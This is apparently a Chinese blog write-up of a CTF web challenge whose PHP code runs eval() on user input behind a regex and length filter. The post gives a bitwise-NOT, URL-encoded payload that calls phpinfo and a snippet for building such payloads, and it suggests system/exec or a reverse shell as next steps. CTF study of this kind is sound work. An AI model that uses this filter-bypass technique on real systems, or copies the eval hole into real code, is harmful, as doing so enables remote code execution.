題目為ctf web中php正則繞過題

前言：由于長度限制，且不像其他題目告知flag.php的內(nèi)容， 筆者并沒有求出flag，繞過思路可參考，也歡迎ctf大佬指點迷津。

題目如下，解析flag.php中的flag變量

<?php
include("flag.php");
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>20){
        die("Too Long.");
    }
    if(preg_match("/[A-Za-z0-9_]+/",$code)){
        die("Not Allowed.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}

解題思路

1.題目不告知flag.php的內(nèi)容，所以唯一的辦法只有打印出flag.php，先想辦法繞過

2.因為_也在正則里面，所以 =${_GET}[_]();&_=phpinfo()沒辦法傳入

3.嘗試php7 中的($a)()；來執(zhí)行動態(tài)函數(shù) 例如 ('phpinfo')()

4.那么動態(tài)構(gòu)造函數(shù)名稱即可，可理解，假如你是：(1+1)(); php會先運算1+1=2 然后在調(diào)用：2()；

5.借助大牛的payload (~%8F%97%8F%96%91%99%90)();成功執(zhí)行

image

6.payload構(gòu)造方式如下

<?php
$a = 'phpinfo';
$b=~$a;
echo ~$a;
echo "------";
echo urlencode($b);

** 如何理解？ **
對執(zhí)行的函數(shù)取反然后進行 urlencode 詳細可自行科普

7.當前可執(zhí)行phpinfo，如何獲取flag.php的內(nèi)容？思路繼續(xù)擴展

• a.使用php中的 system 或者exec 函數(shù)進行執(zhí)行系統(tǒng)命令
• b.彈shell？ 繞不過長度限制
• c.使用file()函數(shù)讀取文件，需要聯(lián)合var_dump或者print_r，繞不過長度

以上均是長度限制 筆者解題終于此

擴展 已經(jīng)只flag.php文件的情況下 例如

<?php
    function getFlag(){
        $flag = "111111111111111111";
        echo $flag;
};
?>

那么只需要 執(zhí)行getFlag()函數(shù)即可
('getFlag')();對flag進行編碼

以上就是筆者對php繞過的小理解和內(nèi)容分享

參考文章：http://www.ttk7.cn/post-121.html

歡迎討論，持續(xù)更新中，感謝關(guān)注